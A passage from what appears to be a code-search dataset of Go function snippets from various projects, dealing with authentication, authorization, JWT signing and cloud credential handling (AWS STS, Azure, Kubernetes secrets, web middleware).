{\n\t\tutils.DisplayAppError(\n\t\t\tw,\n\t\t\terr,\n\t\t\t\"Invalid Access Token\",\n\t\t\t401,\n\t\t)\n\t}\n}", "func (c *Config) Client() (*alks.Client, error) {\n\tlog.Println(\"[DEBUG] Validating STS credentials\")\n\n\t// lookup credentials\n\tcreds := getCredentials(c)\n\tcp, cpErr := creds.Get()\n\n\tif cpErr == nil {\n\t\tlog.Printf(\"[DEBUG] Got credentials from provider: %s\\n\", cp.ProviderName)\n\t}\n\n\t// validate we have credentials\n\tif cpErr != nil {\n\t\tif awsErr, ok := cpErr.(awserr.Error); ok && awsErr.Code() == \"NoCredentialProviders\" {\n\t\t\tvar err error\n\t\t\tcreds, err = getCredentialsFromSession(c)\n\t\t\tif err != nil {\n\t\t\t\treturn nil, err\n\t\t\t}\n\t\t\tcp, cpErr = creds.Get()\n\t\t}\n\t}\n\tif cpErr != nil {\n\t\treturn nil, errNoValidCredentialSources\n\t}\n\n\t// create a new session to test credentails\n\tsess, err := session.NewSession(&aws.Config{\n\t\tRegion: aws.String(\"us-east-1\"),\n\t\tCredentials: creds,\n\t})\n\n\t// validate session\n\tif err != nil {\n\t\treturn nil, fmt.Errorf(\"Error creating session from STS. (%v)\", err)\n\t}\n\n\tvar stsconn *sts.STS\n\t// we need to assume another role before creating an ALKS client\n\tif c.AssumeRole.RoleARN != \"\" {\n\t\tarCreds := stscreds.NewCredentials(sess, c.AssumeRole.RoleARN, func(p *stscreds.AssumeRoleProvider) {\n\t\t\tif c.AssumeRole.SessionName != \"\" {\n\t\t\t\tp.RoleSessionName = c.AssumeRole.SessionName\n\t\t\t}\n\n\t\t\tif c.AssumeRole.ExternalID != \"\" {\n\t\t\t\tp.ExternalID = &c.AssumeRole.ExternalID\n\t\t\t}\n\n\t\t\tif c.AssumeRole.Policy != \"\" {\n\t\t\t\tp.Policy = &c.AssumeRole.Policy\n\t\t\t}\n\t\t})\n\n\t\tcp, cpErr = arCreds.Get()\n\t\tif cpErr != nil {\n\t\t\treturn nil, fmt.Errorf(\"The role %q cannot be assumed. Please verify the role ARN, role policies and your base AWS credentials\", c.AssumeRole.RoleARN)\n\t\t}\n\n\t\tstsconn = sts.New(sess, &aws.Config{\n\t\t\tRegion: aws.String(\"us-east-1\"),\n\t\t\tCredentials: arCreds,\n\t\t})\n\t} else {\n\t\tstsconn = sts.New(sess)\n\t}\n\n\t// make a basic api call to test creds are valid\n\t_, serr := stsconn.GetCallerIdentity(&sts.GetCallerIdentityInput{})\n\t// check for valid creds\n\tif serr != nil {\n\t\treturn nil, serr\n\t}\n\n\t// got good creds, create alks sts client\n\tclient, err := alks.NewSTSClient(c.URL, cp.AccessKeyID, cp.SecretAccessKey, cp.SessionToken)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\t// 1. Check if calling for a specific account\n\tif len(c.Account) > 0 && len(c.Role) > 0 {\n\t\t// 2. Generate client specified\n\t\tclient, err = generateNewClient(c, client)\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t}\n\n\tclient.SetUserAgent(fmt.Sprintf(\"alks-terraform-provider-%s\", getPluginVersion()))\n\n\tlog.Println(\"[INFO] ALKS Client configured\")\n\n\treturn client, nil\n}", "func Authorize(o Owner, issuer string) (string, error) {\n\tsigningKey := []byte(os.Getenv(\"APP_KEY\"))\n\tclaims := owner{\n\t\to,\n\t\tjwt.StandardClaims{\n\t\t\tExpiresAt: time.Now().Add(time.Hour * 48).Unix(),\n\t\t\tIssuer: issuer,\n\t\t},\n\t}\n\n\ttoken := jwt.NewWithClaims(jwt.SigningMethodHS256, claims)\n\treturn token.SignedString(signingKey)\n}", "func AuthorizeAgent(c *gin.Context) {\n\tsecret := c.MustGet(\"agent\").(string)\n\tif secret == \"\" {\n\t\tc.String(401, \"invalid or empty token.\")\n\t\treturn\n\t}\n\n\tparsed, err := token.ParseRequest(c.Request, func(t *token.Token) (string, error) {\n\t\treturn secret, nil\n\t})\n\tif err != nil {\n\t\tc.String(500, \"invalid or empty token. %s\", err)\n\t\tc.Abort()\n\t} else if parsed.Kind != token.AgentToken {\n\t\tc.String(403, \"invalid token. please use an agent token\")\n\t\tc.Abort()\n\t} else {\n\t\tc.Next()\n\t}\n}", "func (s *DataStore) GetCredentialFromSecret(secretName string) (map[string]string, error) {\n\tsecret, err := s.GetSecretRO(s.namespace, secretName)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tcredentialSecret := make(map[string]string)\n\tif secret.Data == nil {\n\t\treturn credentialSecret, nil\n\t}\n\tcredentialSecret[types.AWSIAMRoleArn] = string(secret.Data[types.AWSIAMRoleArn])\n\tcredentialSecret[types.AWSAccessKey] = string(secret.Data[types.AWSAccessKey])\n\tcredentialSecret[types.AWSSecretKey] = string(secret.Data[types.AWSSecretKey])\n\tcredentialSecret[types.AWSEndPoint] = string(secret.Data[types.AWSEndPoint])\n\tcredentialSecret[types.AWSCert] = string(secret.Data[types.AWSCert])\n\tcredentialSecret[types.CIFSUsername] = string(secret.Data[types.CIFSUsername])\n\tcredentialSecret[types.CIFSPassword] = string(secret.Data[types.CIFSPassword])\n\tcredentialSecret[types.AZBlobAccountName] = string(secret.Data[types.AZBlobAccountName])\n\tcredentialSecret[types.AZBlobAccountKey] = string(secret.Data[types.AZBlobAccountKey])\n\tcredentialSecret[types.AZBlobEndpoint] = string(secret.Data[types.AZBlobEndpoint])\n\tcredentialSecret[types.AZBlobCert] = string(secret.Data[types.AZBlobCert])\n\tcredentialSecret[types.HTTPSProxy] = string(secret.Data[types.HTTPSProxy])\n\tcredentialSecret[types.HTTPProxy] = string(secret.Data[types.HTTPProxy])\n\tcredentialSecret[types.NOProxy] = string(secret.Data[types.NOProxy])\n\tcredentialSecret[types.VirtualHostedStyle] = string(secret.Data[types.VirtualHostedStyle])\n\treturn credentialSecret, nil\n}", "func (settings FileSettings) GetAuthorizer(resourceBaseURI string) (autorest.Authorizer, error) {\n\tif resourceBaseURI == \"\" {\n\t\tresourceBaseURI = azure.PublicCloud.ServiceManagementEndpoint\n\t}\n\tif a, err := settings.ClientCredentialsAuthorizer(resourceBaseURI); err == nil {\n\t\treturn a, err\n\t}\n\tif a, err := settings.ClientCertificateAuthorizer(resourceBaseURI); err == nil {\n\t\treturn a, err\n\t}\n\treturn nil, errors.New(\"auth file missing client and certificate credentials\")\n}", "func (u *User) Authorize(principalID string) error {\n\tvar err error\n\tif u.Role != AdminGroupName && principalID != u.Username {\n\t\terr = errors.NewUnathorizedError(fmt.Sprintf(\"User [%s] with role: [%s] attempted to act on a lease for [%s], but was not authorized\",\n\t\t\tu.Username, u.Role, principalID))\n\t}\n\treturn err\n}", "func (settings EnvironmentSettings) GetAuthorizer() (autorest.Authorizer, error) {\n\t//1.Client Credentials\n\tif c, e := settings.GetClientCredentials(); e == nil {\n\t\tlogger.Instance.Writeln(logger.LogInfo, \"EnvironmentSettings.GetAuthorizer() using client secret credentials\")\n\t\treturn c.Authorizer()\n\t}\n\n\t//2. Client Certificate\n\tif c, e := settings.GetClientCertificate(); e == nil {\n\t\tlogger.Instance.Writeln(logger.LogInfo, \"EnvironmentSettings.GetAuthorizer() using client certificate credentials\")\n\t\treturn c.Authorizer()\n\t}\n\n\t//3. Username Password\n\tif c, e := settings.GetUsernamePassword(); e == nil {\n\t\tlogger.Instance.Writeln(logger.LogInfo, \"EnvironmentSettings.GetAuthorizer() using user name/password credentials\")\n\t\treturn c.Authorizer()\n\t}\n\n\t// 4. MSI\n\tif !adal.MSIAvailable(context.Background(), nil) {\n\t\treturn nil, errors.New(\"MSI not available\")\n\t}\n\tlogger.Instance.Writeln(logger.LogInfo, \"EnvironmentSettings.GetAuthorizer() using MSI authentication\")\n\treturn settings.GetMSI().Authorizer()\n}", "func (arc *AppRoleCredentials) Validate() error {\n\tif arc.RoleID == \"\" {\n\t\treturn ErrInvalidRoleID\n\t}\n\tif arc.SecretID == \"\" {\n\t\treturn ErrInvalidSecretID\n\t}\n\treturn nil\n}", "func CredentialsForSecret(secretName string, secretNamespace string, clientset kubernetes.Interface) (user string, password string, err error) {\n\tif secretName == \"\" {\n\t\treturn DefaultRPCUser, DefaultRPCPassword, nil\n\t}\n\t// Try to get secret\n\tsecret, err := clientset.CoreV1().Secrets(secretNamespace).Get(secretName, metav1.GetOptions{})\n\tif err != nil {\n\t\tklog.Errorf(\"Could not get secret, error is %s\\n\", err)\n\t\treturn DefaultRPCUser, DefaultRPCPassword, err\n\t}\n\tdata, ok := secret.Data[UserKey]\n\tif !ok {\n\t\treturn DefaultRPCUser, DefaultRPCPassword, fmt.Errorf(\"Secret does not contain key %s\", UserKey)\n\t}\n\tuser = string(data)\n\tdata, ok = secret.Data[PasswordKey]\n\tpassword = string(data)\n\tif !ok {\n\t\treturn DefaultRPCUser, DefaultRPCPassword, fmt.Errorf(\"Secret does not contain key %s\", PasswordKey)\n\t}\n\treturn user, password, nil\n}", "func (l Login) Authorize() {\n\t// Check if AccessToken is present\n\ttokenPresent := l.config.checkAccessToken()\n\tif tokenPresent {\n\t\t// Verify if token works.\n\t\terr := l.test()\n\t\tif err != nil {\n\t\t\tl.loginAsIntegration()\n\t\t} else { // Success!\n\t\t\treturn\n\t\t}\n\t} else { // AccessToken not present\n\t\tl.loginAsIntegration()\n\t}\n}", "func (m HTTPBasicManager) Authorize(auth *headerauth.AuthInfo) (val interface{}, err *headerauth.AuthErr) {\n\tif password, ok := m.Accounts[auth.AccessKey]; !ok || password != auth.Secret {\n\t\terr = &headerauth.AuthErr{401, errors.New(\"invalid credentials\")}\n\t} else {\n\t\t// In CheckHeader we changed the AccessKey to be the actual username, instead\n\t\t// of the Base64 encoded authentication string.\n\t\tval = auth.AccessKey\n\t}\n\treturn\n}", "func (a *Authorizer) Authorize(ctx context.Context, attrs *authorization.Attributes) (bool, error) {\n\tif attrs != nil {\n\t\tlogger = logger.WithFields(logrus.Fields{\n\t\t\t\"zz_request\": map[string]string{\n\t\t\t\t\"apiGroup\": attrs.APIGroup,\n\t\t\t\t\"apiVersion\": attrs.APIVersion,\n\t\t\t\t\"namespace\": attrs.Namespace,\n\t\t\t\t\"resource\": attrs.Resource,\n\t\t\t\t\"resourceName\": attrs.ResourceName,\n\t\t\t\t\"username\": attrs.User.Username,\n\t\t\t\t\"verb\": attrs.Verb,\n\t\t\t},\n\t\t})\n\t}\n\n\t// Get cluster roles binding\n\tclusterRoleBindings, err := a.Store.ListClusterRoleBindings(ctx, &store.SelectionPredicate{})\n\tif err != nil {\n\t\tswitch err := err.(type) {\n\t\tcase *store.ErrNotFound:\n\t\t\t// No ClusterRoleBindings founds, let's continue with the RoleBindings\n\t\t\tlogger.WithError(err).Debug(\"no ClusterRoleBindings found\")\n\t\tdefault:\n\t\t\tlogger.WithError(err).Warning(\"could not retrieve the ClusterRoleBindings\")\n\t\t\treturn false, err\n\t\t}\n\t}\n\n\t// Inspect each cluster role binding\n\tfor _, clusterRoleBinding := range clusterRoleBindings {\n\t\tbindingName := clusterRoleBinding.Name\n\n\t\t// Verify if this cluster role binding matches our user\n\t\tif !matchesUser(attrs.User, clusterRoleBinding.Subjects) {\n\t\t\tlogger.Debugf(\"the user is not a subject of the ClusterRoleBinding %s\", bindingName)\n\t\t\tcontinue\n\t\t}\n\n\t\t// Get the RoleRef that matched our user\n\t\trules, err := a.getRoleReferencerules(ctx, clusterRoleBinding.RoleRef)\n\t\tif err != nil {\n\t\t\treturn false, err\n\t\t}\n\n\t\t// Loop through the rules\n\t\tfor _, rule := range rules {\n\t\t\t// Verify if this rule applies to our request\n\t\t\tallowed, reason := ruleAllows(attrs, rule)\n\t\t\tif allowed {\n\t\t\t\tlogger.Debugf(\"request authorized by the ClusterRoleBinding %s\", bindingName)\n\t\t\t\treturn true, nil\n\t\t\t}\n\t\t\tlogger.Tracef(\"%s by rule %+v\", reason, rule)\n\t\t}\n\t\tlogger.Debugf(\"could not authorize the request with the ClusterRoleBinding %s\",\n\t\t\tbindingName,\n\t\t)\n\t\tlogger.Debugf(\"could not authorize the request with any ClusterRoleBindings\")\n\t}\n\n\t// None of the cluster roles authorized our request. Let's try with roles\n\t// First, make sure we have a namespace\n\tif len(attrs.Namespace) > 0 {\n\t\t// Get roles binding\n\t\troleBindings, err := a.Store.ListRoleBindings(ctx, &store.SelectionPredicate{})\n\t\tif err != nil {\n\t\t\tswitch err := err.(type) {\n\t\t\tcase *store.ErrNotFound:\n\t\t\t\t// No ClusterRoleBindings founds, let's continue with the RoleBindings\n\t\t\t\tlogger.WithError(err).Debug(\"no RoleBindings found\")\n\t\t\tdefault:\n\t\t\t\tlogger.WithError(err).Warning(\"could not retrieve the ClusterRoleBindings\")\n\t\t\t\treturn false, err\n\t\t\t}\n\t\t}\n\n\t\t// Inspect each role binding\n\t\tfor _, roleBinding := range roleBindings {\n\t\t\tbindingName := roleBinding.Name\n\n\t\t\t// Verify if this role binding matches our user\n\t\t\tif !matchesUser(attrs.User, roleBinding.Subjects) {\n\t\t\t\tlogger.Debugf(\"the user is not a subject of the RoleBinding %s\", bindingName)\n\t\t\t\tcontinue\n\t\t\t}\n\n\t\t\t// Get the RoleRef that matched our user\n\t\t\trules, err := a.getRoleReferencerules(ctx, roleBinding.RoleRef)\n\t\t\tif err != nil {\n\t\t\t\treturn false, err\n\t\t\t}\n\n\t\t\t// Loop through the rules\n\t\t\tfor _, rule := range rules {\n\t\t\t\t// Verify if this rule applies to our request\n\t\t\t\tallowed, reason := ruleAllows(attrs, rule)\n\t\t\t\tif allowed {\n\t\t\t\t\tlogger.Debugf(\"request authorized by the RoleBinding %s\", bindingName)\n\t\t\t\t\treturn true, nil\n\t\t\t\t}\n\t\t\t\tlogger.Tracef(\"%s by rule %+v\", reason, rule)\n\t\t\t}\n\t\t\tlogger.Debugf(\"could not authorize the request with the RoleBinding %s\",\n\t\t\t\tbindingName,\n\t\t\t)\n\t\t}\n\t\tlogger.Debugf(\"could not authorize the request with any RoleBindings\")\n\t}\n\n\tlogger.Debugf(\"unauthorized request\")\n\treturn false, nil\n}", "func GetCredentials(parameters *ClientParameters) *Credentials {\n\treturn getCredentials(parameters)\n}", "func AuthorizeHasEASiRole(ctx context.Context) (bool, error) {\n\treturn HasRole(ctx, model.RoleEasiUser)\n}", "func (c *RestController) Authorize(w http.ResponseWriter, r *http.Request) {\n\tvar req BasicOauth2Request\n\tif err := c.Decode(r, &req, net.NewDecodeOptions(true, true, false, true)); err != nil {\n\t\tc.Error(w, err)\n\t\treturn\n\t}\n\tif id, secret, hasAuth := r.BasicAuth(); hasAuth {\n\t\treq.ClientID = id\n\t\treq.ClientSecret = secret\n\t}\n\tres, err := c.service.Authorize(r.Context(), &req)\n\tif err != nil {\n\t\tc.Error(w, err)\n\t\treturn\n\t}\n\tif len(req.RedirectURI) > 0 {\n\t\tnr, _ := http.NewRequest(\"GET\", req.RedirectURI, nil)\n\t\tc.URL(nr, res)\n\t\thttp.Redirect(w, nr, nr.URL.String(), http.StatusFound)\n\t\treturn\n\t}\n\tc.JSON(w, res, http.StatusOK)\n}", "func (c *Client) Credentials() string {\n\ts0 := hex.EncodeToString(c.i)\n\ts1 := hex.EncodeToString(c.A.Bytes())\n\treturn s0 + \":\" + s1\n}", "func NewBearerCredentials(tok string) *BearerCredentials {\n\treturn &BearerCredentials{token: tok}\n}", "func (s *ProxyServer) Authorize(ctx context.Context, tlsConn *tls.Conn, params common.ConnectParams) (*common.ProxyContext, error) {\n\tctx, err := s.middleware.WrapContextWithUser(ctx, tlsConn)\n\tif err != nil {\n\t\treturn nil, trace.Wrap(err)\n\t}\n\tauthContext, err := s.cfg.Authorizer.Authorize(ctx)\n\tif err != nil {\n\t\treturn nil, trace.Wrap(err)\n\t}\n\tidentity := authContext.Identity.GetIdentity()\n\tif params.User != \"\" {\n\t\tidentity.RouteToDatabase.Username = params.User\n\t}\n\tif params.Database != \"\" {\n\t\tidentity.RouteToDatabase.Database = params.Database\n\t}\n\tif params.ClientIP != \"\" {\n\t\tidentity.ClientIP = params.ClientIP\n\t}\n\tcluster, servers, err := s.getDatabaseServers(ctx, identity)\n\tif err != nil {\n\t\treturn nil, trace.Wrap(err)\n\t}\n\treturn &common.ProxyContext{\n\t\tIdentity: identity,\n\t\tCluster: cluster,\n\t\tServers: servers,\n\t\tAuthContext: authContext,\n\t}, nil\n}", "func (a *Config) GetRole(c echo.Context) string {\n\treqToken := c.Request().Header.Get(\"Authorization\")\n\tsplitToken := strings.Split(reqToken, \"Bearer\")\n\tif len(splitToken) != 2 {\n\t\treturn \"\"\n\t}\n\treqToken = strings.TrimSpace(splitToken[1])\n\treturn a.Source.GetRoleByToken(reqToken)\n}", "func (ac *accessController) Authorized(ctx context.Context, accessRecords ...auth.Access) (context.Context, error) {\n\tvar resData ResponseData\n\tvar err1 error\n\treq, err := context.GetRequest(ctx)\n\t//res, err2 := context.GetResponseWriter(ctx)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tif req.Header.Get(\"SSL_CLIENT_CERT\") == \"\" {\n\t\tlog.Debugln(\"repo name: %s\", getName(ctx))\n\n\t\treturn nil, &challenge{\n\t\t\trealm: ac.realm,\n\t\t\terr: fmt.Errorf(\"Authentication Failure\"),\n\t\t}\n\t}\n\n\tpemStr := req.Header.Get(\"SSL_CLIENT_CERT\")\n\tlog.Debugln(\"SSL CERT: %s\", pemStr)\n\trepoName := getName(ctx)\n\t//if it is a push request\n\t//or the the URI requested is /v2/ (ping)\n\t//then don't call authentication service\n\tlog.Debugln(\"requestURI: \", req.RequestURI)\n\tlog.Debugln(\"requested repo name: \", getName(ctx))\n\tif skipAuth(req) {\n\t\tlog.Debugln(\"Returning without calling authentication servie\")\n\t\treturn auth.WithUser(ctx, auth.UserInfo{Name: \"entitled-ping\"}), nil\n\t}\n\n\t// check for repo name being empty. If repo name is empty\n\t// and the URI is not for ping, return authentication error\n\tif \"/v2/\" != req.RequestURI && repoName == \"\" {\n\t\tlog.Errorln(\"No repo name retrieved. This should not happen\")\n\t\treturn nil, &challenge{\n\t\t\trealm: ac.realm,\n\t\t\terr: fmt.Errorf(\"Authentication Failure as no repo name has been supplied\"),\n\t\t}\n\t}\n\n\tlibraryName := repoName[:strings.LastIndex(repoName, \"/\")+1]\n\tlog.Debugln(\"Computed library name: \", libraryName)\n\tpath := fmt.Sprintf(\"/content/dist/rhel/server/7/7Server/x86_64/containers/registry/%s\", libraryName)\n\n\tif resData, err1 = ac.service.CheckEntitlementV2(req, path); err1 != nil {\n\t\tlog.Errorln(\"Service returned error: \", err1)\n\t\treturn nil, &challenge{\n\t\t\trealm: ac.realm,\n\t\t\terr: fmt.Errorf(\"Authentication Failure\"),\n\t\t}\n\t}\n\n\tif resData.Verified != \"true\" {\n\t\tlog.Errorln(\"Service returned unauthenticated/unauthorized\")\n\t\treturn nil, &challenge{\n\t\t\trealm: ac.realm,\n\t\t\terr: fmt.Errorf(\"Authentication Failure\"),\n\t\t}\n\t}\n\n\treturn auth.WithUser(ctx, auth.UserInfo{Name: \"entitled\"}), nil\n}", "func Authorized(c *gin.Context) {\n\tuserRaw, exists := c.Get(\"user\")\n\tif !exists {\n\t\tc.AbortWithStatus(401)\n\t\treturn\n\t}\n\tsession := sessions.Default(c)\n\n\tuser := userRaw.(models.User)\n\tredisToken := session.Get(user.Email)\n\ttokenString, err := c.Cookie(\"token\")\n\tif err != nil {\n\t\t// try reading HTTP Header\n\t\tauthorization := c.Request.Header.Get(\"Authorization\")\n\t\tif authorization == \"\" {\n\t\t\tc.AbortWithStatus(401)\n\t\t\treturn\n\t\t}\n\t\tsp := strings.Split(authorization, \"Bearer \")\n\t\t// invalid token\n\t\tif len(sp) < 1 {\n\t\t\tc.AbortWithStatus(401)\n\t\t\treturn\n\t\t}\n\t\ttokenString = sp[1]\n\t}\n\n\tif redisToken != tokenString {\n\t\tc.AbortWithStatus(401)\n\t\treturn\n\t}\n}", "func (o CorsPolicyResponseOutput) AllowCredentials() pulumi.BoolOutput {\n\treturn o.ApplyT(func(v CorsPolicyResponse) bool { return v.AllowCredentials }).(pulumi.BoolOutput)\n}", "func (k *Kluster) Credentials(params ...string) {\n\t// DEBUG:\n\t// k.ui.Log.Debugf(\"credentials to assign to platform %s. (%v)\", k.Platform(), params)\n\tk.provisioner[k.Platform()].Credentials(params...)\n}", "func NewAuthorizerFromEnvironment() (autorest.Authorizer, error) {\n\tsettings, err := getAuthenticationSettings()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tif settings.resource == \"\" {\n\t\tsettings.resource = settings.environment.ResourceManagerEndpoint\n\t}\n\n\treturn settings.getAuthorizer()\n}", "func Authorize(next http.Handler, jwtSigningKey, apiKey string) http.Handler {\n\treturn http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {\n\t\thttputil.Authorize(w, r, jwtSigningKey, apiKey, next)\n\t})\n}", "func (ba *BasicAuth) Authorize(req *restful.Request) (authorized bool) {\n\tlog.Debug(\"verifying Basic Auth\")\n\tusername, password, ok := req.Request.BasicAuth()\n\tif ok && username == ba.username && password == ba.password {\n\t\tlog.Debug(\"failed to verify using Basic Auth\")\n\t\tauthorized = true\n\t}\n\treturn\n}", "func (r *Request) BasicAuthCredentials() (string, string, bool) {\n\treturn r.BasicAuth()\n}", "func (a Authorizer) Authorize(rw http.ResponseWriter, req *http.Request) error {\n\treturn nil\n}", "func (a Authorizer) Authorize(rw http.ResponseWriter, req *http.Request) error {\n\treturn nil\n}", "func (st *Store) Authorized(r *http.Request) (t *Token, err error) {\n\tvar v = r.Context().Value(st.ctxKey)\n\tvar ok bool\n\n\tif nil == v {\n\t\treturn nil, errors.New(\"Authorization Unknown/Not Processed\")\n\t}\n\n\tif t, ok = v.(*Token); ok {\n\t\treturn\n\t}\n\n\tif err, ok = v.(error); ok {\n\t\treturn\n\t}\n\n\treturn\n}", "func (a *Approval) Roles() []string {\n\treturn a.allowedRoles\n}", "func Authorize(ctx *fiber.Ctx) error {\n\t// get authorization header\n\trawToken := ctx.Get(\"Authorization\")\n\tif rawToken == \"\" {\n\t\treturn utilities.Response(utilities.ResponseParams{\n\t\t\tCtx: ctx,\n\t\t\tInfo: configuration.ResponseMessages.MissingToken,\n\t\t\tStatus: fiber.StatusUnauthorized,\n\t\t})\n\t}\n\ttrimmedToken := strings.TrimSpace(rawToken)\n\tif trimmedToken == \"\" {\n\t\treturn utilities.Response(utilities.ResponseParams{\n\t\t\tCtx: ctx,\n\t\t\tInfo: configuration.ResponseMessages.MissingToken,\n\t\t\tStatus: fiber.StatusUnauthorized,\n\t\t})\n\t}\n\n\t// parse JWT\n\tclaims, parsingError := utilities.ParseClaims(trimmedToken)\n\tif parsingError != nil {\n\t\treturn utilities.Response(utilities.ResponseParams{\n\t\t\tCtx: ctx,\n\t\t\tInfo: configuration.ResponseMessages.AccessDenied,\n\t\t\tStatus: fiber.StatusUnauthorized,\n\t\t})\n\t}\n\n\t// check Redis\n\tkey := utilities.KeyFormatter(\n\t\tconfiguration.Redis.Prefixes.User,\n\t\tclaims.UserId,\n\t)\n\tredisContext := context.Background()\n\tredisImage, redisError := redis.Client.Get(redisContext, key).Result()\n\tif redisError != nil {\n\t\t// the key was not found\n\t\tif redisError == redis.Nil {\n\t\t\t// load an Image record\n\t\t\tImageCollection := DB.Instance.Database.Collection(DB.Collections.Image)\n\t\t\trawImageRecord := ImageCollection.FindOne(\n\t\t\t\tctx.Context(),\n\t\t\t\tbson.D{{Key: \"userId\", Value: claims.UserId}},\n\t\t\t)\n\t\t\timageRecord := &Schemas.Image{}\n\t\t\trawImageRecord.Decode(imageRecord)\n\t\t\tif imageRecord.ID == \"\" {\n\t\t\t\treturn utilities.Response(utilities.ResponseParams{\n\t\t\t\t\tCtx: ctx,\n\t\t\t\t\tInfo: configuration.ResponseMessages.AccessDenied,\n\t\t\t\t\tStatus: fiber.StatusUnauthorized,\n\t\t\t\t})\n\t\t\t}\n\n\t\t\t// store image in Redis regardless of its validity\n\t\t\tredisUserError := redis.Client.Set(\n\t\t\t\tredisContext,\n\t\t\t\tkey,\n\t\t\t\timageRecord.Image,\n\t\t\t\tconfiguration.Redis.TTL,\n\t\t\t).Err()\n\t\t\tif redisUserError != nil {\n\t\t\t\treturn utilities.Response(utilities.ResponseParams{\n\t\t\t\t\tCtx: ctx,\n\t\t\t\t\tInfo: configuration.ResponseMessages.InternalServerError,\n\t\t\t\t\tStatus: fiber.StatusInternalServerError,\n\t\t\t\t})\n\t\t\t}\n\n\t\t\t// compare images\n\t\t\tif claims.Image != imageRecord.Image {\n\t\t\t\treturn utilities.Response(utilities.ResponseParams{\n\t\t\t\t\tCtx: ctx,\n\t\t\t\t\tInfo: configuration.ResponseMessages.AccessDenied,\n\t\t\t\t\tStatus: fiber.StatusUnauthorized,\n\t\t\t\t})\n\t\t\t}\n\n\t\t\t// store token data in Locals\n\t\t\tctx.Locals(\"Client\", claims.Client)\n\t\t\tctx.Locals(\"UserId\", claims.UserId)\n\t\t\treturn ctx.Next()\n\t\t}\n\t\treturn utilities.Response(utilities.ResponseParams{\n\t\t\tCtx: ctx,\n\t\t\tInfo: configuration.ResponseMessages.InternalServerError,\n\t\t\tStatus: fiber.StatusInternalServerError,\n\t\t})\n\t}\n\tif redisImage != claims.Image {\n\t\treturn utilities.Response(utilities.ResponseParams{\n\t\t\tCtx: ctx,\n\t\t\tInfo: configuration.ResponseMessages.AccessDenied,\n\t\t\tStatus: fiber.StatusUnauthorized,\n\t\t})\n\t}\n\n\t// update EXPIRE for the record in Redis\n\texpireError := redis.Client.Expire(redisContext, key, configuration.Redis.TTL).Err()\n\tif expireError != nil {\n\t\treturn utilities.Response(utilities.ResponseParams{\n\t\t\tCtx: ctx,\n\t\t\tInfo: configuration.ResponseMessages.InternalServerError,\n\t\t\tStatus: fiber.StatusInternalServerError,\n\t\t})\n\t}\n\n\t// store client and token data in Locals\n\tctx.Locals(\"Client\", claims.Client)\n\tctx.Locals(\"UserId\", claims.UserId)\n\treturn ctx.Next()\n}", "func AuthorizeServices(ctx *fiber.Ctx) error {\n\t// get authorization header\n\trawSecret := ctx.Get(\"X-WS-SECRET\")\n\tif rawSecret == \"\" {\n\t\treturn utilities.Response(utilities.ResponseParams{\n\t\t\tCtx: ctx,\n\t\t\tInfo: configuration.ResponseMessages.MissingSecret,\n\t\t\tStatus: fiber.StatusUnauthorized,\n\t\t})\n\t}\n\ttrimmedSecret := strings.TrimSpace(rawSecret)\n\tif trimmedSecret == \"\" {\n\t\treturn utilities.Response(utilities.ResponseParams{\n\t\t\tCtx: ctx,\n\t\t\tInfo: configuration.ResponseMessages.MissingSecret,\n\t\t\tStatus: fiber.StatusUnauthorized,\n\t\t})\n\t}\n\n\t// validate the secret\n\twsSecret := os.Getenv(\"WS_SECRET\")\n\tif wsSecret != trimmedSecret {\n\t\treturn utilities.Response(utilities.ResponseParams{\n\t\t\tCtx: ctx,\n\t\t\tInfo: configuration.ResponseMessages.AccessDenied,\n\t\t\tStatus: fiber.StatusUnauthorized,\n\t\t})\n\t}\n\n\treturn ctx.Next()\n}", "func (c *Connector) Authenticate(auth *endpoint.Authentication) (err error) {\n\tif auth == nil {\n\t\treturn fmt.Errorf(\"failed to authenticate: missing credentials\")\n\t}\n\turl, err := c.getURL(urlResourceAuthorize)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tb, _ := json.Marshal(authorizeResquest{Username: auth.User, Password: auth.Password})\n\tpayload := bytes.NewReader(b)\n\treq, _ := http.NewRequest(\"POST\", url, payload)\n\treq.Header.Add(\"content-type\", \"application/json\")\n\treq.Header.Add(\"cache-control\", \"no-cache\")\n\n\tres, err := c.getHTTPClient().Do(req)\n\tif err == nil {\n\t\tdefer res.Body.Close()\n\t\tbody, _ := ioutil.ReadAll(res.Body)\n\n\t\tkey, err := parseAuthorizeResult(res.StatusCode, res.Status, body)\n\t\tif err != nil {\n\t\t\tif c.verbose {\n\t\t\t\tlog.Printf(\"JSON sent for %s\\n%s\", urlResourceAuthorize, strings.Replace(fmt.Sprintf(\"%s\", b), auth.Password, \"********\", -1))\n\t\t\t}\n\t\t\treturn err\n\t\t}\n\t\tc.apiKey = key\n\t\treturn nil\n\t}\n\treturn err\n}", "func GetAssumeRoleCreds(role string) (creds credentials.Value, region string, err error) {\n\t// SharedConfigEnable is needed to support profiles with assume role config\n\tsessOpts := session.Options{\n\t\tSharedConfigState: session.SharedConfigEnable,\n\t\tProfile: role,\n\t}\n\tsess := session.Must(session.NewSessionWithOptions(sessOpts))\n\tcreds, err = sess.Config.Credentials.Get()\n\tif err != nil {\n\t\treturn creds, \"\", err\n\t}\n\n\treturn creds, *sess.Config.Region, nil\n}", "func (c *CredentialsConfig) assumeRole(userCredentials client.ConfigProvider) *session.Session {\n\tassumeConfig := &aws.Config{\n\t\tRegion: aws.String(c.Region),\n\t\tCredentials: stscreds.NewCredentials(userCredentials, c.RoleARN),\n\t\tEndpoint: aws.String(c.Endpoint),\n\t\tDisableSSL: aws.Bool(true),\n\t}\n\treturn session.New(assumeConfig)\n}", "func Authorization(ctx context.Context) (string, error) {\n\treturn fromMeta(ctx, AuthKey)\n}", "func (o *DataPlaneAPI) Authorizer() runtime.Authorizer {\n\n\treturn o.APIAuthorizer\n\n}", "func (t *Application) cliCredentials() (*credentials.Credentials, error) {\n\tif *t.Token != \"\" && *t.Hub == \"\" {\n\t\treturn nil, trace.BadParameter(\"--hub flag must be provided if --token flag is provided\")\n\t}\n\tif *t.Hub != \"\" {\n\t\treturn credentials.FromTokenAndHub(*t.Token, *t.Hub), nil\n\t}\n\treturn nil, trace.NotFound(\"no CLI credentials provided\")\n}", "func Authorize(c *gin.Context){\n\n\tusername := c.PostForm(\"username\")\n\tpassword := 